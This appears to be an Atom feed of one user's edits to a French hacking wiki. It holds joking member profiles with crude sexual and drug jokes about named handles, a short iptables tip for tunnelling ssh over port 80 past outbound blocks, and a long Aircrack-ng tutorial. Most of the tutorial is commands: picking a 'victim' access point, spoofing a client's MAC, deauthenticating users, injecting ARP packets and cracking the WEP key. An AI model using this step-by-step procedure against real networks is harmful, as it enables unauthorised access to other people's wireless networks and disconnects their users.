<?xml version="1.0"?>
<?xml-stylesheet type="text/css" href="http://hack-it.org/skins/common/feed.css?207"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>http://hack-it.org/index.php?feed=atom&amp;target=Mattoufoutu&amp;title=Sp%C3%A9cial%3AContributions</id>
		<title>Hack-it.org - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="http://hack-it.org/index.php?feed=atom&amp;target=Mattoufoutu&amp;title=Sp%C3%A9cial%3AContributions"/>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Sp%C3%A9cial:Contributions/Mattoufoutu"/>
		<updated>2026-04-18T14:43:08Z</updated>
		<subtitle>De Hack-it.org.</subtitle>
		<generator>MediaWiki 1.15.1</generator>

	<entry>
		<id>http://hack-it.org/index.php?title=Pork_Team</id>
		<title>Pork Team</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Pork_Team"/>
				<updated>2011-03-14T21:42:42Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;/* mattoufoutu */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Les oiseaux de passage&lt;br /&gt;
&lt;br /&gt;
txuus [R] Kiwi Euler SpAcEMaN2 Flusher Kheops Friz Disconnected DonDiego ZeBest DESPOTES yahourt [yop] z4ppy Emualynk wobu der_troll sun schnokbul karmamox T0aD Midna Skizophrenix ifrancois lapin bibifok Imad psykowolf psyke xerxas cyborg93 dragorz fraktal atak Anihilator Psylo 	Kalinoga Tr!n!Ty Schaka MaXiMaToR spiracle ravachol sbam brounie&lt;br /&gt;
brakk&lt;br /&gt;
fnord&lt;br /&gt;
ff&lt;br /&gt;
onozendai&lt;br /&gt;
psychik&lt;br /&gt;
roch&lt;br /&gt;
miss rizz&lt;br /&gt;
JFK99&lt;br /&gt;
Chipster&lt;br /&gt;
triskel&lt;br /&gt;
flunkout&lt;br /&gt;
beiron&lt;br /&gt;
salska&lt;br /&gt;
kasper&lt;br /&gt;
josee&lt;br /&gt;
luxifer&lt;br /&gt;
mattoufoutu&lt;br /&gt;
arareli&lt;br /&gt;
bigsicret&lt;br /&gt;
kewl&lt;br /&gt;
psyke&lt;br /&gt;
Thor&lt;br /&gt;
sayber&lt;br /&gt;
druid&lt;br /&gt;
poil&lt;br /&gt;
R&lt;br /&gt;
tatata&lt;br /&gt;
harluad&lt;br /&gt;
lizil&lt;br /&gt;
casual&lt;br /&gt;
flox2&lt;br /&gt;
champi&lt;br /&gt;
itwer&lt;br /&gt;
L'Ocus&lt;br /&gt;
pokmoon&lt;br /&gt;
absolut&lt;br /&gt;
mardi_soir&lt;br /&gt;
teuk&lt;br /&gt;
eponae&lt;br /&gt;
Thib- Tonyroy Ludwig Tom Oprhée Artefact&lt;br /&gt;
&lt;br /&gt;
Les bots&lt;br /&gt;
&lt;br /&gt;
Shalmaneser mediapork&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Lizil ==&lt;br /&gt;
&lt;br /&gt;
Notre tout jeune et sémillant stagiaire. Refuse toute forme d'autorité, de contrainte ou de travail, mais nous fournit souvent un éclairage précieux sur les vocables et les modes de sa &amp;quot;e-génération&amp;quot;. Lizil est un de ces ados branchés, férus de jeux vidéos, se regroupant sur des sites étranges qu'ils appellent des 4chans. Là bas, il a fondé avec d'autres sacripans un groupe de &amp;quot;noëlistes&amp;quot;  avec qui il se livre à des tours pendables. Ces farceurs s'expriment dans un langage très créatif qui nous serait totalement abscons sans son aide et nous passerions pour des vieux cons. Voilà.&lt;br /&gt;
&lt;br /&gt;
Caractère: Instable. Profite de son jeune âge et de son aura de rebelle ténébreux pour séduire d'innocentes jeunes filles qu'il se plait ensuite à tourmenter. &lt;br /&gt;
&lt;br /&gt;
Compétences: Aucune. Ah si. Peut secréter lui même des toxines le conduisant à toutes sortes d'hallucinations, n'a donc pas besoin de se droguer.&lt;br /&gt;
&lt;br /&gt;
Uptime: moyen. tente d'avoir un nycthémère bien régulier malgré son absence d'occupation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== ff ==&lt;br /&gt;
&lt;br /&gt;
ff est un hibou. Parisien sceptique et blasé, est revenu de tout et n'est impressionné par rien. Il aime prendre des doses semi-mortelles d'une douzaine de substances psychotropes qu'il a synthétisé lui-même dans son laboratoire puis se rendre à un concert chiant de Radio France. Son plaisir est alors de s'entretenir toute la soirée avec la personne la plus ennuyeuse qu'il trouve tout en essayant de garder une apparence convenable malgré les effets démentiels de la drogue.&lt;br /&gt;
&lt;br /&gt;
Sa vraie passion: le ménage, le repassage, la vaisselle. ff est un maniaque du rangement. &amp;quot;Un appartement bien rangé, c'est le seul endroit où je peux me droguer&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Compétences: multiples et vastes. chimiste, biologiste, musicologue, pétomane, séducteur de veuves éplorées. Egalement un UNIX-guru mais refuse d'aider les noobz parce qu'ils doivent apprendre par eux mêmes&lt;br /&gt;
&lt;br /&gt;
Uptime: moyen. diurne. considère l'irc comme une maitresse et donc ne la fréquente plus (par délicatesse) lorsqu'il est maqué.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== FlUnKoUt ==&lt;br /&gt;
&lt;br /&gt;
FlUnKoUt a 4 passions: manger bio, gueuler contre le gouvernement, collectionner les mainframes dans son appartement et les sextoyz. Il rentre fatigué du boulot, se lave les mains au savon d'Alep et à l'eau minérale et se prépare une bonne pizza. Farine bio, levure bio, tomates bio origan bio, câpres bio etc. Puis commence le rituel: il allume son pc, ouvre 54 terminaux (un pour chaque machine) et tape cat /proc/cpuinfo dans chacun. Contemple avec concupiscence des dizaines d'architecture différentes et commence à se toucher à travers son pantalon. Ecume ensuite ebay à la recherche d'un cul moulé en latex avec poignées (molded ass with handles). Un peu de politique dans les RSS et sur usenet. Surfe finalement le web à la recherche de jpeg et avi scabreux genre lesbiennes qui chient et vomissent dans un bol. Une fois qu'il est tout à fait en transe, il allume sa webcam et chasse l'hétérosexuel, qu'il va amener du côté obscur en l'hypnotisant de ses yeux de serpents. S'endort et recommence.&lt;br /&gt;
&lt;br /&gt;
Compétences: véritable encyclopédie du sextoy. sait installer debian partout même sur le microcontroleur d'un cul moulé en latex avec poignées (molded ass etc)&lt;br /&gt;
&lt;br /&gt;
Uptime: très régulier. Se connecte à 19h38 et coupe à 01h43. Tous les jours depuis les modems RTC.&lt;br /&gt;
&lt;br /&gt;
== harluad ==&lt;br /&gt;
&lt;br /&gt;
Vieux marin tatoué de partout. Vit dans un camion qu'il a compilé lui même avec les flags mercedes diesel. Du coup il a que deux vitesses qui fonctionnent: la 3ème et la marche arrière. Thuriféraire de Gentoo, mais vous l'aurez deviné.&lt;br /&gt;
&lt;br /&gt;
== mattoufoutu ==&lt;br /&gt;
&lt;br /&gt;
Au lycée les filles quand elles parlaient entre elles le surnommaient &amp;quot;le python&amp;quot;, il a d'ailleurs fini par se la faire tatouer, en python, avec des écailles et tout. C'était douloureux, mais wouah ça produit son effet. Mattoufoutu essaie de faire croire aux gens que son chien est un pur doberman mais les gens restent sceptiques: les pattes sont bien trop courtes et il a une drôle de touffe frisée sur la tête.&lt;br /&gt;
Connecté depuis le wifi d'un voisin, ou un point-phone avec une carte méditerranéo il a souvent du mal à comprendre ce qu'on écrit à cause du brouhaha turco-berbéro-peul autour de lui. Fait la manche pour se payer un routeur linux.&lt;br /&gt;
&lt;br /&gt;
uptime: 24/24h&lt;br /&gt;
&lt;br /&gt;
== cerberus ==&lt;br /&gt;
&lt;br /&gt;
S'est retiré du monde quand sa calvitie a poussée. Il appelle ça son calvinisme, mais il est bizarre, faut dire. Il partage sa vie avec un chat asthmatique qui s'appelle Pline l'ancien. Ils vivent tous deux dans un appartement aux fenêtres murées. Cerberus est un adepte de seti@home, il attend des extra-terrestres. Sans computation, non, il pense tout simplement qu'ils viendront bientôt le chercher.&lt;br /&gt;
&lt;br /&gt;
compétences: Sait dessiner et tiens relativement bien la bouteille s'il s'agit de Calva. Collectionne les consoles Sega et détient toujours un record de points sur un obscur jeu japonais de Master System&lt;br /&gt;
&lt;br /&gt;
uptime: n00b&lt;br /&gt;
&lt;br /&gt;
== luxifer ==&lt;br /&gt;
&lt;br /&gt;
Se shoote au cactus. Luxifer a deux amours: l'UML et Led Zeppelin. Sa chambre est tapissée de posters: Led Zeppelin et divers diagrammes. S'amuse à faire croire qu'il s'occupe de généalogie et affirme avoir dans son arbre plusieurs indiens d'amérique dont des sioux.&lt;br /&gt;
&lt;br /&gt;
compétences: UML&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
uptime: régulier.&lt;br /&gt;
&lt;br /&gt;
== Pandark ==&lt;br /&gt;
Un tout nouveau, qui reve de vivre en chine pour bouffer du bambou cru. Il a monté son propren serveur web at home un jour ou il avait plus de shit pour comater. http://arkanda.co.cc/&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Iptables</id>
		<title>Iptables</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Iptables"/>
				<updated>2010-07-26T13:07:59Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Forwarder un port vers l'autre pour une ip particulière ==&lt;br /&gt;
 iptables -t nat -I PREROUTING -i eth0 -s 91.165.96.43 -p tcp --dport 80 -j REDIRECT --to 22&lt;br /&gt;
Très pratique quand on se retrouve sur un pc dont les ports non-http sont bloqués  vers l'extérieur. Dans cet exemple, on redirige localement le port http vers ssh&lt;br /&gt;
&lt;br /&gt;
== Ajouter/enlever/modifier des regles ==&lt;br /&gt;
La box dispose désormais d'un script de démarrage pour iptables, ça permet d'éviter de devoir refaire les règles à la main à chaque reboot.&lt;br /&gt;
Donc pour ajouter une règle, ben ça se passe comme avant, via le shell. Sauf que maintenant, après avoir ajouté/retiré/modifié une regle, il faut bien penser à faire:&lt;br /&gt;
 /etc/init.d/iptables save&lt;br /&gt;
pour sauvegarder les nouvelles regles&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Iptables</id>
		<title>Iptables</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Iptables"/>
				<updated>2010-07-26T13:05:27Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Forwarder un port vers l'autre pour une ip particulière&lt;br /&gt;
 iptables -t nat -I PREROUTING -i eth0 -s 91.165.96.43 -p tcp --dport 80 -j REDIRECT --to 22&lt;br /&gt;
Très pratique quand on se retrouve sur un pc dont les ports non-http sont bloqués  vers l'extérieur. Dans cet exemple, on redirige localement le port http vers ssh&lt;br /&gt;
&lt;br /&gt;
== Ajout de regles ==&lt;br /&gt;
La box dispose désormais d'un script de démarrage pour iptables, ça permet d'éviter de devoir refaire les règles à la main à chaque reboot.&lt;br /&gt;
Donc pour ajouter une règle, ben ça se passe comme avant, via le shell. Sauf que maintenant, après avoir ajouté/retiré/modifié une regle, il faut bien penser à faire:&lt;br /&gt;
 /etc/init.d/iptables save&lt;br /&gt;
pour sauvegarder les nouvelles regles&lt;/div&gt;</summary>
		<author><name>Mattoufoutu</name></author>	</entry>

	<entry>
		<id>http://hack-it.org/index.php?title=Aircrack-ng</id>
		<title>Aircrack-ng</title>
		<link rel="alternate" type="text/html" href="http://hack-it.org/index.php?title=Aircrack-ng"/>
				<updated>2009-05-16T21:47:28Z</updated>
		
		<summary type="html">&lt;p&gt;Mattoufoutu&amp;nbsp;:&amp;#32;/* Méthode &amp;quot;-p 0841&amp;quot; */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Les outils de la suite aircrack ==&lt;br /&gt;
&lt;br /&gt;
=== aircrack-ng ===&lt;br /&gt;
Sert à casser la clé WEP, depuis la derniere version, il utilise l'algorythme PTW par défaut.&lt;br /&gt;
&lt;br /&gt;
=== airbase-ng ===&lt;br /&gt;
Sert à simuler un point d'accès afin d'attaquer le client qui se connectera au &amp;quot;fake-ap&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== airdecap-ng ===&lt;br /&gt;
Sert à déchiffrer un fichier pcap (.cap) à l'aide de la clé WEP/WPA si nécessaire, afin de pouvoir consulter les paquets à l'aide d'un logiciel tel que wireshark.&lt;br /&gt;
&lt;br /&gt;
=== airdecloak-ng ===&lt;br /&gt;
Sert à décloaker (démasquer) les bssid cloakés&lt;br /&gt;
&lt;br /&gt;
=== airdriver-ng ===&lt;br /&gt;
Sert à compiler, dés/installer les drivers appropriés à votre carte.&lt;br /&gt;
&lt;br /&gt;
=== aireplay-ng ===&lt;br /&gt;
Sert à injecter des paquets et à s'authentifier auprès des AP.&lt;br /&gt;
&lt;br /&gt;
=== airmon-ng ===&lt;br /&gt;
Sert à dés/activer le mode monitor sur votre carte.&lt;br /&gt;
&lt;br /&gt;
=== airodump-ng ===&lt;br /&gt;
Sert à rechercher des AP cibles et de voir les stations associées aux AP. Permet également de capturer les paquets lors de l'attaque.&lt;br /&gt;
&lt;br /&gt;
=== airserv-ng ===&lt;br /&gt;
Serveur pour carte WiFi. Permet à plusieurs applications sans fil d'utiliser indépendament la carte via une connection TCP de type client-serveur.&lt;br /&gt;
&lt;br /&gt;
=== airolib-ng ===&lt;br /&gt;
Permet de créer une base de données sqlite en vue d'un crack WPA.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.'''&lt;br /&gt;
&lt;br /&gt;
=== airtun-ng ===&lt;br /&gt;
&lt;br /&gt;
=== buddy-ng ===&lt;br /&gt;
A utiliser avec easside-ng&lt;br /&gt;
&lt;br /&gt;
=== easside-ng ===&lt;br /&gt;
Outil &amp;quot;auto-magic&amp;quot; permettant de communiquer avec un AP utilisant le chiffrement WEP sans en connaitre la clé.&lt;br /&gt;
&lt;br /&gt;
=== ivstools ===&lt;br /&gt;
Permet d'extraire les IVs d'un fichier pcap, ou bien de rassembler plusieurs fichiers .ivs en un seul.&lt;br /&gt;
&lt;br /&gt;
=== makeivs ===&lt;br /&gt;
Permet de créer un fichier .ivs à partir d'une clé WEP connue.&lt;br /&gt;
&lt;br /&gt;
=== packetforge-ng ===&lt;br /&gt;
Sert à forger des paquets de différents types (le plus souvent un ARP en vue d'une injection).&lt;br /&gt;
&lt;br /&gt;
=== tkiptun-ng ===&lt;br /&gt;
Permet d'aider au crack de clés WPA utilisant TKIP.&lt;br /&gt;
&amp;lt;br /&amp;gt;'''ATTENTION: Cet outil n'est pas encore fonctionnel.'''&lt;br /&gt;
&lt;br /&gt;
=== wesside-ng ===&lt;br /&gt;
Outil permettant l'automatisation du crack de clé WEP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;big&amp;gt;&amp;lt;u&amp;gt;'''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT'''&amp;lt;/u&amp;gt;&amp;lt;/big&amp;gt;&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Les drivers WiFi ==&lt;br /&gt;
Pour charger, décharger ou compiler des drivers, utiliser airdriver-ng.&lt;br /&gt;
* Pour connaitre les drivers supportés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng supported&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers déjà installés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aidriver-ng installed&lt;br /&gt;
&lt;br /&gt;
* Pour connaitre les drivers WiFi chargés dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng loaded&lt;br /&gt;
&lt;br /&gt;
* Pour détecter les cartes WiFi:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng detect&lt;br /&gt;
&lt;br /&gt;
* Pour décharger un driver inutile:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng unload $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour compiler un driver:&lt;br /&gt;
Récupérer les sources du kernel, s'assurer d'avoir les outils de compilation classiques installés, puis taper:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airdriver-ng compile $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour installer un driver fraichement compilé:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng install $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour charger un driver dans le kernel:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng load $num_driver&lt;br /&gt;
&lt;br /&gt;
* Pour avoir des détails sur un driver:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airdriver-ng details $num_driver&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les différents types d'attaques ==&lt;br /&gt;
Dans les cas où l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type &amp;quot;macchanger --mac $mac $iface&amp;quot;, et relancer la carte.&lt;br /&gt;
&lt;br /&gt;
=== Légende ===&lt;br /&gt;
$iface : interface correspondant à la carte WiFi (wlan0, rausb0, mon0 ou autre)&lt;br /&gt;
&amp;lt;br /&amp;gt;$canal = canal wifi à utiliser (colonne &amp;quot;CH&amp;quot; dans airodump-ng)&lt;br /&gt;
&amp;lt;br /&amp;gt;$bssid_cible = BSSID du point d'acces ciblé&lt;br /&gt;
&amp;lt;br /&amp;gt;$essid_cible = ESSID du point d'acces ciblé (peut parfois etre masqué)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_carte = adresse MAC de la carte wifi (peut etre la meme que celle d'un client connecté en cas de MAC spoofing)&lt;br /&gt;
&amp;lt;br /&amp;gt;$mac_client = adresse MAC du client associé au point d'acces ciblé (colonne &amp;quot;STATION&amp;quot; dans airodump-ng)&lt;br /&gt;
&lt;br /&gt;
=== Mac spoofing ===&lt;br /&gt;
Pour les procédures ci-dessous, dans les cas où l'association ne fonctionne pas, il faut couper la carte et changer l'adresse mac de la carte par celle d'un client connecté à la station, et relancer la carte:&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt;macchanger --mac $mac_client $iface&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;ARP replay&amp;quot; ===&lt;br /&gt;
'''Méthode avec client et sans filtrage MAC'''&lt;br /&gt;
* Mettre carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 30 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;30 = temps d'attente entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-3 = attaque ARP replay&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED !!!''&lt;br /&gt;
&lt;br /&gt;
=== Methode &amp;quot;chop-chop&amp;quot; et &amp;quot;par fragmentation&amp;quot; ===&lt;br /&gt;
'''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;lt;br /&amp;gt;&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfice à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à l'AP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succes, &amp;quot;Association successful :-)&amp;quot; doit s'afficher''&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
** En cas de filtrage MAC:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = déauthentification&lt;br /&gt;
&amp;lt;br /&amp;gt;1 = nombre de deauth à envoyer à la fois (0 -&amp;gt; indéfiniment)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP&lt;br /&gt;
&amp;lt;br /&amp;gt;''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''&lt;br /&gt;
&lt;br /&gt;
* Attaque:&lt;br /&gt;
Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop.&lt;br /&gt;
&amp;lt;br /&amp;gt;Dans les 2 cas, un fichier .xor sera créé en cas de succès.&lt;br /&gt;
** Par fragmentation:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-5 = attaque par fragmentation&lt;br /&gt;
** Chop-chop:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-4 = attaque chop-chop&lt;br /&gt;
&lt;br /&gt;
* Création d'un paquet ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = générer un paquet ARP&lt;br /&gt;
&amp;lt;br /&amp;gt;-k = IP de destination (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-l = IP source (la plupart des AP répondent au 255.255.255.255)&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = nom du fichier dans lequel mettre le paquet ARP&lt;br /&gt;
&lt;br /&gt;
* Injection de l'ARP:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -r $fichier_arp $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = selection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aircrack-ng $fichier_capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''CRACKED''&lt;br /&gt;
&lt;br /&gt;
=== Méthode &amp;quot;-p 0841&amp;quot; ===&lt;br /&gt;
'''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)'''&lt;br /&gt;
* Mettre la carte en mode monitor:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; ifconfig $iface down&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airmon-ng start $iface&lt;br /&gt;
&lt;br /&gt;
* Trouver une victime:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;''Couper une fois la victime trouvée''&lt;br /&gt;
&lt;br /&gt;
* Lancer la capture d'IVs:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-w = préfixe à utiliser pour le nom du fichier de capture&lt;br /&gt;
&amp;lt;br /&amp;gt;''Laisser tourner...''&lt;br /&gt;
&lt;br /&gt;
* Associer la carte à la station:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-1 = fake association&lt;br /&gt;
&amp;lt;br /&amp;gt;0 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;''En cas de succès, &amp;quot;Association successful :-)&amp;quot; doit s'afficher&lt;br /&gt;
** En cas d'échec:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;6000 = temps d'attente (en ms) entre 2 tentatives&lt;br /&gt;
&amp;lt;br /&amp;gt;-o = nombre de jeux de paquets à envoyer à la fois&lt;br /&gt;
&amp;lt;br /&amp;gt;-q = intervale entre 2 paquets &amp;quot;keep-alive&amp;quot;&lt;br /&gt;
** En cas de filtrage MAC:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -0 1 -a $bssid_cible -c $mac_client $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-0 = déauthentification&lt;br /&gt;
&amp;lt;br /&amp;gt;1 = nombre de deauth à envoyer à la fois (0 -&amp;gt; indéfiniment)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = client à déauthentifier (si pas spécifié, les deauth sont envoyés à tous les clients connectés à l'AP&lt;br /&gt;
&amp;lt;br /&amp;gt;''Vérifier dans airodump-ng si le client est bien déauthentifié, sinon recommencer, et envoyer plus de deauths à la fois si besoin''&lt;br /&gt;
&lt;br /&gt;
* Lancer l'injection:&lt;br /&gt;
&amp;gt;&amp;gt;&amp;gt; aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface&lt;br /&gt;
&amp;lt;br /&amp;gt;-2 = sélection de paquets interactive (accepter le paquet avec &amp;quot;y&amp;quot;)&lt;br /&gt;
&amp;lt;br /&amp;gt;-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets&lt;br /&gt;
&amp;lt;br /&amp;gt;''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant''&lt;br /&gt;
&lt;br /&gt;
